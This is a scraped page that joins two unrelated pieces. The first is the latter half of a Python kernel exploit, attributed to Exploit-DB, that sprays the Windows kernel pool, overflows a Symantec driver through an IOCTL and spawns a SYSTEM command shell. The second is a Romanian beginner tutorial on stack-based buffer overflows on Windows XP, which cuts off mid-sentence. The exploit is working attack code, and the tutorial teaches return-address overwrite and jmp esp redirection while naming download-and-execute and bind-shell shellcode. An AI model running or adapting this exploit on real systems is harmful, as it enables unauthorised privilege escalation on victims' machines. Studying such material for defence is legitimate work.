quota + header + TypeIndex csrc = create_string_buffer(overflow, evil_child_block_size) wrote = c_ulong(0) res = kernel32.WriteProcessMemory(phandle, v, addressof(csrc), evil_child_block_size, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() print "[+] evil_child_block address: %s" % hex(v) return v def triggerIOCTL(): """ Trigger the vulnerable IOCTL code """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = u"\\\\.\\SYSPLANT" dwReturn = c_ulong() driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) if not driver_handle or driver_handle == -1: getLastError() sys.exit() ioctl = 0x00222084 evil_input = "\x41" * 4 + struct.pack("<L", ioctl) + "D" * 56 evil_size = len(evil_input) print "[+] IOCTL: %s" % hex(ioctl) print "[+] Buf size: %d" % evil_size einput = create_string_buffer(evil_input, evil_size) eoutput = create_string_buffer("\x00"*1024, 1024) dev_ioctl = kernel32.DeviceIoControl(driver_handle , ioctl, addressof(einput) , evil_size, addressof(eoutput), 1024, byref(dwReturn) , None) def spray(): """Spray the Kernel Pool with IoCompletionReserve Objects. Each object is 0x60 bytes in length and is allocated from the Nonpaged kernel pool""" global handles, done handles = {} IO_COMPLETION_OBJECT = 1 for i in range(0, 50000): hHandle = HANDLE(0) ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT) #print "[+] New Object created successfully, handle value: ", hHandle handles[hHandle.value]=hHandle print "[+] Spray done!" def findMemoryWindows(): """ Find all possible windows of 0x480 bytes with a further adjacent IoCompletionReserve object that we can overwrite. Finally trigger 0x00222084 to allocate the IOCTL input buffer in one of the windows. The IOCTL input buffer has been changed to avoid the overflow at this time, so that we can study the allocations without BSODing the box""" global handles, done mypid = os.getpid() khandlesd = {} khandlesl = [] # Leak Kernel Handles for pid, handle, obj in get_handles(): #print handle, obj if pid==mypid and get_type_info(handle)=="IoCompletionReserve": khandlesd[obj] = handle khandlesl.append(obj) # Find holes and make our allocation holes = [] for obj in khandlesl: # obj address is the handle address, but we want to allocation # address, so we just remove the size of the object header from it. # IoCompletionReserve Chunk Header 0x30 alloc = obj-0x30 # Get allocations at beginning of the page if (alloc&0xfffff000) == alloc: # find holes # If we get a KeyError allocations are not adjecient try: holes.append( ( khandlesd[obj+0x580],khandlesd[obj+0x520], khandlesd[obj+0x4c0],khandlesd[obj+0x460], khandlesd[obj+0x400],khandlesd[obj+0x3a0], khandlesd[obj+0x340],khandlesd[obj+0x2e0], khandlesd[obj+0x280],khandlesd[obj+0x220], khandlesd[obj+0x1c0],khandlesd[obj+0x160], khandlesd[obj+0x100]) ) print "[+] Hole Window found @ %s" % hex(alloc) except KeyError: pass # Create Memory Windows of 0x480 bytes (0x60*12) ... print " [*] Your IOCTL Allocation will be @ 0x*****100" print " [*] The Overflown Allocation will be @ 0x*****580" for hole in holes: kernel32.CloseHandle(handles[ hole[1] ]) kernel32.CloseHandle(handles[ hole[2] ]) kernel32.CloseHandle(handles[ hole[3] ]) kernel32.CloseHandle(handles[ hole[4] ]) kernel32.CloseHandle(handles[ hole[5] ]) kernel32.CloseHandle(handles[ hole[6] ]) kernel32.CloseHandle(handles[ hole[7] ]) kernel32.CloseHandle(handles[ hole[8] ]) kernel32.CloseHandle(handles[ hole[9] ]) kernel32.CloseHandle(handles[ hole[10] ]) kernel32.CloseHandle(handles[ hole[11] ]) kernel32.CloseHandle(handles[ hole[12] ]) # Make our Alloc of 0x480 bytes... triggerIOCTL() # trigger code execution for hole in holes: kernel32.CloseHandle(handles[ hole[0] ]) # Spawn a system shell os.system("cmd.exe /T:C0 /K cd C:\\Windows\\system32\\") done = False if __name__ == '__main__': global handles, done exploit = False done = True header() try: if sys.argv[1].lower() == 'exploit': exploit = True except IndexError: pass if not exploit: print "[+] Patching Input buffer from SYSFER Memory" phandle = c_ulong() # Use the following with Pyinstaller (2 parent processes) # parentpid = getppid(None, True) # Use the following from python script (parent is cmd.exe) # 1) parentpid = getppid(None, False) print "[+] Parent PID: %d" % parentpid # 2) phandle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0x0, parentpid) print "[+] Parent Handle: %d" % phandle # 3) child_block,child_block_s,sysfer_child_block,sysfer_child_block_s =\ getSysFerPointer(phandle) evil_child_block_size = 0x44c # pool overflow and TypeIndex overwrite # 4) evil_child_block = allocInput(phandle, evil_child_block_size) # 5) craftSysFerData(phandle, sysfer_child_block, sysfer_child_block_s, evil_child_block, evil_child_block_size) kernel32.CloseHandle(phandle) print "[+] NOW RUN %s exploit" % sys.argv[0] sys.exit() # 6) Alloc shellcode allocShellcode() # 7) Spray #spray() dwThreadId1 = c_ulong(0) THREADFUNC = CFUNCTYPE(None) spray_thread = THREADFUNC(spray) hThread1 = HANDLE(0) hThread1 = windll.kernel32.CreateThread(0,0,spray_thread,0,0,byref(dwThreadId1)) print "[+] Spray Thread Created TID: %d" % hThread1 curpr = windll.kernel32.GetThreadPriority(hThread1) print "[+] Current priority: %d" % curpr print "[+] Setting high priority...." windll.kernel32.SetThreadPriority(hThread1, 2) curpr = windll.kernel32.GetThreadPriority(hThread1) time.sleep(3) # 8) Create holes to fit our allocation and trigger the IOCTL #findMemoryWindows() dwThreadId2 = c_ulong(0) findMemoryWindows_thread = THREADFUNC(findMemoryWindows) hThread2 = HANDLE(0) hThread2 = windll.kernel32.CreateThread(0,0,findMemoryWindows_thread,0,0,byref(dwThreadId2)) print "[+] findMemoryWindows Thread Created TID: %d" % hThread2 curpr = windll.kernel32.GetThreadPriority(hThread2) print "[+] Current priority: %d" % curpr print "[+] Setting high priority...." windll.kernel32.SetThreadPriority(hThread2, 2) curpr = windll.kernel32.GetThreadPriority(hThread2) while done: time.sleep(1) Sursa: http://www.exploit-db.com/exploits/34272/

Introducere Am decis sa scriu un astfel de tutorial deoarece nu am mai vazut niciun astfel de articol scris in limba romana care sa explice pe intelesul tuturor care este cauza acestor probleme dar si cum se pot exploata. Tutorialul se adreseaza incepatorilor, dar sunt necesare cel putin cunostinte de programare C/C++ pentru a putea intelege conceptele. Sistemul pe care vom descoperi si exploata problema este Windows XP (pe 32 de biti) din motive de simplitate: nu exista ASLR, o notiune pe care o vom discuta in detaliu mai jos. Vreau sa incep cu o scurta introducere in limbaje de asamblare. Nu voi prezenta in detaliu, dar voi descrie pe scurt notiunile necesare pentru a intelege cum apare un "buffer overflow" si cum se poate exploata. Exista mai multe tipuri de buffer overflow-uri, aici il vom discuta pe cel mai simplu, stack based buffer overflow. Daca doriti acest articol in format PDF, il puteti descarca de aici: https://rstforums.com/fisiere/SBOF.pdf Introducere in ASM Pentru a ma asigura ca inteleg toti programatorii C/C++, voi explica ce se intampla cu codul C/C++ cand este compilat. Un programator scrie codul: #include <stdio.h> int main() { puts("RST rullz"); return 0; } Compilatorul va translata aceste instructiuni in limbaj de asamblare apoi aceste intructiuni vor fi transpuse in "cod masina" (cunoscut si ca shellcode). Exemplu, intructiunile in limbaj de asamblare: [B][COLOR=#0000ff]PUSH [/COLOR][/B]OFFSET [COLOR=#ff0000]SimpleEX.??_C@_09GGKPFABJ@RST?5rullz?$AA@[/COLOR] ; /s = "RST rullz"[B][COLOR=#0000ff]CALL [/COLOR][/B]DWORD PTR [B][COLOR=#008000]DS[/COLOR][/B]:[<&[COLOR=#ff0000]MSVCR100.puts[/COLOR]>] ; \puts[B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]4[/COLOR][B][COLOR=#0000ff]XOR [/COLOR][COLOR=#008000]EAX[/COLOR][/B],[B][COLOR=#008000]EAX[/COLOR][/B][COLOR=#0000ff][B]RETN[/B][/COLOR] Nu e nevoie sa intelegeti deocamdata ce se intampla acolo. Apoi, acest cod e reprezentabil in cod masina: 68 F4200300 [B][COLOR=#0000ff]PUSH [/COLOR][/B]OFFSET [COLOR=#ff0000]SimpleEX.??_C@_09GGKPFABJ@RST?5rullz?$AA@[/COLOR] ; /s = "RST rullz"FF15 A0200300 [B][COLOR=#0000ff]CALL [/COLOR][/B]DWORD PTR [B][COLOR=#008000]DS[/COLOR][/B]:[<&[COLOR=#ff0000]MSVCR100.puts[/COLOR]>] ; \puts83C4 04 [B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]4[/COLOR]33C0 [B][COLOR=#0000ff]XOR [/COLOR][COLOR=#008000]EAX[/COLOR][/B],[B][COLOR=#008000]EAX[/COLOR][/B]C3 [B][COLOR=#0000ff]RETN[/COLOR][/B] Se poate vedea ca acum avem in plus o serie de octeti: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. Prin acei octeti din dreptul lor sunt reprezentate si intelese de catre procesor instructiunile. Cu alte cuvinte, procesorul va citi aceasta serie de octeti si le va interpreta ca pe instructiunile din limbajul de asamblare. Procesorul nu stie de variabilele din C. Procesorul are propriile sale "variabile", mai exact fiecare procesor are doar niste registri in care poate memora date. Acesti registri sunt urmatorii (doar cei necesari): - EAX, EBX, ECX, EDX, ESI, EDI - Registrii generali care memoreaza date - EIP - Registru special: un program care executa rand pe rand fiecare instructiune a sa (din ASM). Sa zicem ca prima instructiune se afla in memorie la adresa 0x10000000. O instructiune poate sa aiba unu sau mai multi octeti. Sa presupunem ca are 3 octeti. Initial, valoarea acestui registru e 0x10000000. Dupa ce procesorul executa acea instructiune, valoarea registrului va fi schimbata la 0x10000003 - ESP - Stack pointer. Vom discuta mai in detaliu stack-ul ulterior. Pentru moment e de ajuns sa intelegeti ca stack-ul se afla in memorie si acest registru memoreaza adresa de memorie la care se afla varful stivei (stack). Mai exista de asemenea registru EBP care reprezinta "baza stivei" Toti acesti registri au 4 octeti. Acel "E" vine de la "Extended" deoarece procesoarele pe 16 biti aveau registri pe 16 biti: AX, BC, CX, DX. Informativ, pe sistemele pe 64 de biti, registrii sunt: RAX, RBX... Un concept extrem de important si care trebuie inteles cand vine vorba de limbaje de asamblare il reprezinta stiva (stack). Stiva e o structura de date in care datele (elementele de pe stiva) sunt puse "una peste alta" si la un moment dat poate fi scos de pe stiva doar elementul din varful stivei. Sau, cum explica o doamna profesoara de la Universitate, o stiva este ca niste farfurii puse una peste alta: cand adaugi una, o pui peste celelalte, iar cand vrei sa scoti una, o scoti mai intai pe cea din varf. Stiva este foarte folosita la nivel de procesor deoarece: - variabilele locale dintr-o functie sunt puse pe stiva - parametrii cu care e apelata o functie sunt pusi pe stiva Exista doua notiuni importante care trebuie intelese cand se lucreaza cu procesoare Intel: - procesoarele sunt little endian: mai exact, daca aveti o variabila int x = 0x11223344, aceasta nu se va afla in memorie ca "0x11223344" ci ca "0x44332211" - cand se adauga un element pe stiva, valoarea ESP-ului, registru care memoreaza varful stivei, va scadea! Exista doua intructiuni folosite pentru a lucra cu stiva: - PUSH - va pune o valoare (pe 32 de biti) pe stiva - POP - va scoate o valoare (pe 32 de biti) de pe stiva Exemplu de stiva: 24 - 1111 28 - 2222 32 - 3333 Prima coloana o reprezinta valoarea varfului stivei, valoare care scade cand se adauga un nou element, iar a doua coloana contine niste valori aleatoare. Sa adaugam doua elemente pe stiva: PUSH 5555 PUSH 6666 Stiva va arata astfel: 16 - 6666 20 - 5555 24 - 1111 28 - 2222 32 - 3333 Ca sa intelegeti mai usor cum valoarea ESP-ului, registrul care contine un pointer la varful stivei, scade cand sunt puse date pe stiva, priviti acest registru ca pe o valoare "spatiu disponibil pe stiva" care scade cand sunt adaugate date. Dupa cum am exemplificat si mai sus, la fel ca PUSH si POP, procesorul executa "instructiuni" pentru a-si face datoria. Fiecare instructiune are rolul sau, asa cum PUSH pune un element pe stiva si POP il scoate, alte instructiuni realizeaza: - ADD - Face o adunare - SUB - Face o scadere - CALL - Apeleaza o functie - RETN - Returneaza dintr-o functie - JMP - Sare la o adresa - XOR - Operatie binara, dar "XOR EAX, EAX" de exemplu e echivalentul mai optim al atribuirii EAX = 0 - MOV - Face o atribuire - INC - Incrementeaza o valoare (variabila++) - DEC - Decrementeaza o valoare (variabila--) Exista foarte multe astfel de instructiuni, dar acestea ar fi cele mai importante. Sa vedem cateva exemple: - ADD EAX, 5 ; Adauga valoarea 5 la registrul EAX. Adica EAX = EAX + 5 - SUB EDX, 7 ; Scade 5 din valoarea registrului EDX - CALL puts ; Apeleaza functia puts - RETN ; return-ul din C - JMP 0x11223344 ; Sare la instructiunea de la acea adresa - XOR EBX, EBX ; Echivalentul pentru EBX = 0 - MOV ECX, 3 ; Echivalentul pentru ECX = 3 - INC ECX; Echivalentul pentru ECX++ - DEC ECX ; Echivalentul pentru ECX-- Cred ca e destul de usor de inteles. Acum putem intelege ce face mai exact procesorul cu codul nostru care afiseaza un simplu mesaj: 1. PUSH OFFSET SimpleEX.@_rst_@ - Am inlocuit acel sir urat cu ceva mai simplu: este de fapt un pointer la sirul de caractere "RST rullz" din memorie. Instructiunea pune pe stiva pointerul la acest sir. Are ca efect scaderea a 4 octeti (sistem pe 32 de biti) din ESP. Adica "ESP = ESP -4" 2. CALL DWORD PTR DS:[<&MSVCR100.puts>] - Apeleaza functia "puts" din biblioteca "MSVCR100.dll" (Microsoft Visual C Runtime v10) folosita de Visual Studio 2010. Vom detalia mai jos ca pentru a apela o functie, trebuie mai intai sa punem parametrii pe stiva 3. ADD ESP,4 - Acel PUSH a avut ca efect scaderea a 4 octeti necesari pentru a apela functia, acum ii vom elibera de pe stiva adaugand 4 octeti 4. XOR EAX,EAX - Inseamna EAX = 0. Intr-o functie, la return, valoarea returnata va fi continuta de acest registru 5. RETN - Facem "return" din functie Pentru a intelege mai bine cum functioneaza un apel de functie luam urmatorul exemplu: #include <stdio.h>int functie(int a, int { return a + b; } int main() { functie(5, 6); return 0; } Functia "main" va arata astfel: [B][COLOR=#0000ff]PUSH [/COLOR][COLOR=#008000]EBP[/COLOR][/B][COLOR=#0000ff][B]MOV [/B][/COLOR][B][COLOR=#008000]EBP[/COLOR][/B],[COLOR=#008000][B]ESP[/B][/COLOR][COLOR=#0000ff][B]PUSH [/B][/COLOR][COLOR=#ff0000]6[/COLOR] [COLOR=#0000ff][B]PUSH [/B][/COLOR][COLOR=#ff0000]5 [/COLOR][COLOR=#0000ff][B]CALL [/B][/COLOR][COLOR=#ff0000]SimpleEX.functie [/COLOR] [COLOR=#0000ff][B]ADD [/B][/COLOR][COLOR=#008000][B]ESP[/B][/COLOR],[COLOR=#ff0000]8[/COLOR][COLOR=#0000ff][B]XOR [/B][/COLOR][COLOR=#008000][B]EAX[/B][/COLOR],[COLOR=#008000][B]EAX[/B][/COLOR][COLOR=#0000ff][B]POP [/B][/COLOR][COLOR=#008000][B]EBP[/B][/COLOR][COLOR=#0000ff][B]RETN[/B][/COLOR] Iar "functie" va fi de forma: [B][COLOR=#0000ff]PUSH [/COLOR][COLOR=#008000]EBP[/COLOR][/B][B][COLOR=#0000ff]MOV [/COLOR][COLOR=#008000]EBP[/COLOR][/B],[B][COLOR=#008000]ESP[/COLOR][/B][B][COLOR=#0000ff]MOV [/COLOR][COLOR=#008000]EAX[/COLOR][/B],DWORD PTR [B][COLOR=#008000]SS[/COLOR][/B]:[[B][COLOR=#008000]EBP[/COLOR][/B]+[COLOR=#ff0000]8[/COLOR]][B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]EAX[/COLOR][/B],DWORD PTR [B][COLOR=#008000]SS[/COLOR][/B]:[[B][COLOR=#008000]EBP[/COLOR][/B]+[COLOR=#ff0000]C[/COLOR]][B][COLOR=#0000ff]POP [/COLOR][/B][COLOR=#008000][B]EBP[/B][/COLOR][B][COLOR=#0000ff]RETN[/COLOR][/B] Nota: Visual Studio e al dracu de destept (nu sunt ironic) si a facut calculele astfel incat nu mai exista niciun apel catre o alta functie, ci doar o valoare 0xB (adica 11, adica 5+6). Pentru teste puteti dezactiva complet optimizarile din Properties > C++ > Optimization. Se pot observa cateva instructiuni: - PUSH EBP (la inceputul functiilor) - MOV EBP,ESP (la inceputul functiilor) - POP EBP (la final) Ei bine, aceste instructiuni au rolul de a crea "stack frame-uri". Mai exact, au rolul de a "separa" cumva functiile pe stiva, astfel incat registrii EBP si ESP (registrii care contin valorile ce reprezinta baza si varful stivei) sa delimiteze stiva folosita de catre functia respectiva. Spus altfel, cum fiecare functie poate avea propriile variabile, folosind aceste instructiuni, registrul EBP va contine adresa de unde incep datele folosite de functia care a fost apelata, iar ESP va contine varful stivei. Intre valorile ESP - EBP (ESP este mai mic) se afla datele folosite de functie. Sa incepem cu functia care realizeaza adunarea: - MOV EAX,DWORD PTR SS:[EBP+8] - ADD EAX,DWORD PTR SS:[EBP+C] Nu va speriati de acesti DWORD PTR SS:[EBP+8] si DWORD PTR SS:[EBP+C]. Asa cum am discutat anterior, intre EBP si ESP se afla datele folosite de functie. In cazul de fata, aceste date sunt parametrii cu care a fost apelata functia. Acesti parametri se afla pe stiva si sunt accesibili la locatiile EBP+8 si EBP+C, adica la 8 respectiv 12 octeti fata de registrul EBP. De asemenea, in ASM, parantezele patrate sunt folosite ca si "*" in C/C++ cand e vorba de pointeri. Asa cum *p inseamna "valoarea de la adresa p" asa [EBP] inseamna "valoarea de la adresa EBP". E nevoie de o astfel de abordare deoarece EBP contine o adresa de memorie (de pe stiva) si noi avem nevoie de valorile de la adresele respective de memorie. O alta notiune utila este faptul ca "DWORD" specifica faptul ca la acea adresa se afla o valoare pe 4 octeti. Exista cateva tipuri de date care specifica dimensiunile datelor cu care se lucreaza: - BYTE - 1 octet - WORD - 2 octeti - DWORD - 4 octeti Acei SS (Stack Segment) sau DS (Data Segment) sau CS (Code Segment) reprezinta alti registrii care identifica diverse zone/segmente de memorie: stiva, date sau cod, fiecare dintre acestea avand anumite drepturi de acces: read, write sau execute. Functia pune in EAX valoarea primului parametru (a) si adauga la aceasta valoarea celui de-al doilea parametru (. Astfel EAX contine a+b. Trecem acum la ceea ce ne intereseaza de fapt si anume cum se realizeaza apelul unei functii: [B][COLOR=#0000ff]PUSH [/COLOR][/B][COLOR=#ff0000]6[/COLOR] [B][COLOR=#0000ff]PUSH [/COLOR][/B][COLOR=#ff0000]5[/COLOR] [B][COLOR=#0000ff]CALL [/COLOR][/B][COLOR=#ff0000]SimpleEX.functie[/COLOR] [B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]8[/COLOR] Ne amintim ca apelul este "functie(5, 6)". Ei bine, pentru a apela o functie se executa urmatorii pasi: 1. Se pun pe stiva parametrii de la dreapta la stanga. Adica mai intai 6, apoi 5 2. Se apeleaza functia 3. Se elibereaza stiva, se curata parametrii de pe stiva Astfel, mai intai se pun pe stiva doua valori (32 de biti, adica 4 octeti fiecare): 6 apoi 5, se apeleaza functia si apoi se curata stiva: ESP-ul devine ESP+8 (spatiul ocupat de catre cei doi parametri ai functiei) astfel incat ajunge la valoarea initiala, de dinainte de apelul de functie. Am discutat anterior ca pentru eliminarea datelor de pe stiva se poate folosi instructiunea POP, insa nu avem nevoie de POP deoarece nu ne intereseaza valorile de pe stiva, iar in acest caz ar fi nevoie de doua instructiuni POP pentru a elibera stiva. Daca am avea 100 de parametri la o functie ar trebui sa facem 100 de POP-uri, putem rezolva aceasta problema cu o simpla astfel de adunare. Nota: E important dar nu e in scopul acestui tutorial: exista mai multe metode de a apela o functie. Aceasta metoda, care presupune adaugarea parametrilor pe stiva de la dreapta la stanga, apoi eliberarea stivei DUPA apelul functie se numeste "cdecl". Alte functii, precum cele ale sistemului de operare Windows, folosesc o alta metoda de a apela functiile (numita calling convention) numita "stdcall" si care presupune de asemenea punerea parametrilor functiilor pe stiva de la dreapta la stanga, DAR curatarea stivei se face in interiorul functiei, nu dupa apelul acesteia. Un alt lucru important la apelul unei functii este urmatorul, apel realizat folosind intructiunea "call" il reprezinta faptul ca adresa imediat urmatoare instructiunii call care apeleaza functia, este pusa pe stiva! Exemplu: 00261013 | PUSH 6 ; /Arg2 = 00000006 00261015 | PUSH 5 ; |Arg1 = 00000005 00261017 | CALL SimpleEX.functie ; \functie 0026101C | ADD ESP,8 In stanga se afla adresele de memorie la care se afla instructiunile respective. Instructiunile PUSH 5 si PUSH 6 au cate doi octeti. Instructiunea CALL, care se afla la adresa 0x00261017, are 5 octeti. Asadar adresa instructiunii urmatoare este 0x0026101C (adica 0x00261017 + 5). Aceasta este adresa care va fi pusa pe stiva la apelul functiei. Stiva va arata astfel inainte de apelul functiei, dupa cele doua instructiuni PUSH: 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Dupa executarea instructiunii CALL, stiva va arata astfel (adresele stivei din prima coloana sunt informative): 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Urmeaza apoi seria de instructiuni, prolog-ul functiei, care creaza stackframe-urile: - PUSH EBP - MOV EBP,ESP Dupa acel PUSH, stiva va fi de forma: 16 - 32 ; EBP-ul anterior apelului functiei 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Dupa MOV EBP,ESP - EBP-ul va avea valoarea "varful curent al stivei". E important de retinut ca variabilele locale ale functiei sunt plasate AICI pe stiva! Sa modificam functia astfel: int functie(int a, int { int v1 = 3, v2 = 4; return a + b; } Avem acum in plus doua variabile initializate cu valorile 3 si 4. Noul cod al functiei va avea in plus: SUB ESP,8 ; Se aloca spatiu pentru cele doua variabile (fiecare cate 4 octeti) MOV DWORD PTR SS:[EBP-4],3 ; Initializarea primei variabile MOV DWORD PTR SS:[EBP-8],4 ; Initializarea celei de-a doua variabile Astfel stiva va contine: 08 - 4 ; Variabilele locale 12 - 3 16 - 32 ; EBP-ul anterior apelului functiei 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri E obligatoriu de retinut faptul ca variabilele locale ale functiilor sunt puse pe stiva. E de asemenea obligatoriu de inteles ca "adresa de return" e retinuta tot pe stiva. Daca pana in acest punct nu ati inteles exact cum stau lucrurile, ori cereti mai multe detalii explicand ceea ce nu intelegeti, ori incercati sa va documentati singuri citind multitudinea de tutoriale pe care le gasiti pe Google. Stack Based Buffer Overflow Daca ati inteles toate conceptele de mai sus puteti trece mai departe. Daca nu, recititi si incercati sa intelegeti sau va mai puteti documenta, exista o multitudine de articole din care puteti intelege aceste notiuni. Daca totul este in regula, puteti trece la acest capitol. Discutam ca stiva contine urmatoarele (in aceasta ordine, unde "variabilele locale" se afla la "adresa cea mai mica" iar "parametrii functiei" la "adresa cea mai mare"): - Variabilele locale ale functiei (variabil, sa zicem 20 bytes) - EBP-ul anterior (salvat cu PUSH EBP) - Adresa de return (de exemplu 0x0026101C) - Parametri cu care a fost apelata functia Este destul de usor de inteles acum cum functioneaza un Stack Based Buffer Overflow. Sa luam urmatorul caz. Avem functia urmatoare, apelata din main: #include <stdio.h>#include <string.h> // Functia de afisare a numelui void Afiseaza(char *p_pcNume) { // Buffer-ul in care va fi stocat numele char buffer[20]; // Copiem numele in buffer strcpy(buffer, p_pcNume); // Afisam numele printf("Salut: %s", buffer); } // Functia main int main(int argc, char* argv[]) { // Trebuie sa avem un argument, numele if(argc != 2) { puts("Lipseste argumentul: Ex: ./sbof Ionut"); return 1; } // Apelam functia de afisare Afiseaza(argv[1]); return 0; } Programelul este simplu: primeste un parametru in linia de comanda si apeleaza functia "Afiseaza". Problema se poate vedea aici: char buffer[20]; strcpy(buffer, p_pcNume); Avem un buffer (vector) local, de 20 de octeti. Atentie! Nu confundati un vector cu un pointer (char *buffer)! In cazul unui pointer pentru care s-a alocat spatiu cu "malloc" sau "new []", pe stiva se afla doar pointer-ul (4 octeti) NU si spatiul care a fost alocat pe HEAP! Avand un buffer de 20 de octeti pe stiva, copiem in acea variabila sirul de caractere pe care il primim din linia de comanda. Ce se intampla insa daca sirul de caractere depaseste dimensiunea de 20 de octeti? Avem un buffer overflow. Denumirea de "Stack Based Buffer Overflow" vine de la faptul ca acest buffer este memorat pe stiva. Sa vedem cum ar arata o stiva care ar contine toate datele in momentul apelului functiei. 100 - BUFFER - octetii 0-4 104 - BUFFER - octetii 4-8 108 - BUFFER - octetii 8-12 112 - BUFFER - octetii 12-16 116 - BUFFER - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei 124 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 128 - 0x5 132 - 0x6 136 - 0x1337 ; Ce se afla inainte de PUSH-uri Daca apelam functia folosind sirul de caractere "Nytro @ RST", stiva va arata astfel: 100 - Nytr 104 - o @ 108 - RST\0 112 - XXXX - octetii 12-16 (XXXX sunt date aleatoare) 116 - XXXX - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei ... Probabil v-ati dat seama singuri cum se poate exploata aceasta problema: daca suprascriem CORECT stiva, daca apelam programul cu un sir de caractere corect, astfel incat sa SUPRASCRIEM ADRESA DE RETURN, dupa ce functia "Afiseaza" isi va termina executia, in momentul in care se va apela instructiunea RETN, procesorul va sari la adresa pe care noi am suprascris-o: in locul adresei 0x0026101C vom pune noi o anumita adresa. Putem astfel controla executia procesului! Daca vom apela programul astfel: StackBOF.exe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa In debugger se va putea observa urmatoarea eroare: "Access violation when executing [61616161]" Daca nu v-ati dat seama, 0x61 este codul ascii al caracterului "a". Deci procesorul incearca sa execute codul de la adresa "aaaa". Ce putem face in acest caz? Ii putem oferi CORECT (adica la locatia corecta in sirul "aaaa...aaaa") o adresa valida de memorie, la care se afla cod valid, obtinand astfel posibilitatea de a executa cod propriu! Cum putem insa executa propriul cod astfel? Raspunsul este simplu: "jmp esp". Intelegem ca am suprascris stiva. Am suprascris atat "adresa de return" dar am suprascris si ce era DUPA adresa de return. Si e important de precizat faptul ca asa cum la "CALL" pe stiva se pune automat adresa de return, asa la RETN, adresa de return e eliberata de pe stiva si procesorul executa instructiuni incepand cu acea adresa. Asa cum la CALL registrul ESP devine ESP-4 deoarece se adauga 4 octeti (adresa de return), asa la RETN registrul ESP devine ESP+4 deoarece se scoate de pe stiva respectiva adresa. Asta inseamna ca ESP este acum un pointer la datele de DUPA adresa de return, un pointer la niste date pe care NOI le-am pus acolo. Asadar, pentru a dezvolta raspunsul "jmp esp": daca gasim undeva in spatiul de memorie al procesului pe care il exploatam, adica in codul executabilului sau codul din DLL-urile folosite de catre proces, o secventa de cod "jmp esp" putem sa plasam adresa acestei instructiuni in locul adresei de return, astfel incat procesorul, dupa executia instructiunii RETN va sari la acea adresa si va executa "jmp esp" si apoi procesorul va executa instructiunile de pe stiva pe care noi o controlam. Sa presupunem ca gasim instructiunea "jmp ESP" la adresa de memorie 0x11223344. Avem pe stiva: 100 - BUFFER - octetii 0-4 104 - BUFFER - octetii 4-8 108 - BUFFER - octetii 8-12 112 - BUFFER - octetii 12-16 116 - BUFFER - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei 124 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 128 - 0x5 132 - 0x6 136 - 0x1337 ; Ce se afla inainte de PUSH-uri DAR, daca vom suprascrie in mod corect stiva, o vom face astfel: 1. Vom pune "aaaaaaaaaaaaaaaaaaaa" - 20 de octeti - pentru a umple buffer-ul 2. Vom mai pune "aaaa" - 4 octeti - pentru a suprascrie EBP-ul anterior 3. Vom pune 0x11223344 - 4 octeti - adresa de return (adresa instructiunii jmp esp) 4. Vom pune shellcode-ul (cod masina) - pe care vrem sa il executam Stiva va arata astfel: 100 - aaaa 104 - aaaa 108 - aaaa 112 - aaaa 116 - aaaa 120 - aaaa 124 - 0x44332211 ; Little endian 128 - XXXX 132 - XXXX 136 - XXXX ... Unde XXX... e shellcode-ul pe care vrem sa il executam. Daca nu ati mai intalnit acest termen, tineti minte doar ca puteti gasi pe Google/Exploit-DB/Shell-Storm o gramada de shellcode-uri. Exemple: - Download & Execute: care permite descarcarea si executarea unui EXE - Bind TCP: care deschide un port si permite executarea de comenzi - Calc.exe/MessageBox: care deschide calc.exe sau afiseaza un mesaj (pentru teste) Sa vedem pas cu pas cum functioneaza totul (simplificat): void Afiseaza(char *p_pcNume){ char buffer[20]; strcpy(buffer, p_pcNume); } 1. Se primeste argumentul (pentru exploatare) de la tastatura 2. Se apeleaza functia Afiseaza cu acest argument 3. Se pun pe stiva: - pointer la sirul de caractere (parametrul functiei) - adresa de return (la CALL) - EBP anterior (in corpul functiei) (cu PUSH EBP) - buffer-ul (20 de octeti - variabila locala) 4. Se apeleaza strcpy() - se copiaza in buffer primii 20 de octeti (din argumentul de la tastatura) - urmatorii 4 octeti suprascriu EBP-ul enterior - urmatorii 4 octeti suprascriu adresa de return - urmatorii bytes suprascriu restul stivei 5. Se elibereaza spatiul folosit de buffer (se face ADD ESP, 0x14) 6. Se face RETN Ce se intampla acum e important: 1. Se scoate de pe stiva adresa de return (suprascrisa de noi cu o adresa de memorie la care se afla instructiunea "jmp esp") 2. Procesorul sare la adresa respectiva si executa "jmp esp" 3. Efectul este saltul si executia codului prezent pe stiva (ESP-ul contine acum un pointer la datele de dupa "adresa de return") Pe stiva, la adresa ESP, se afla acum 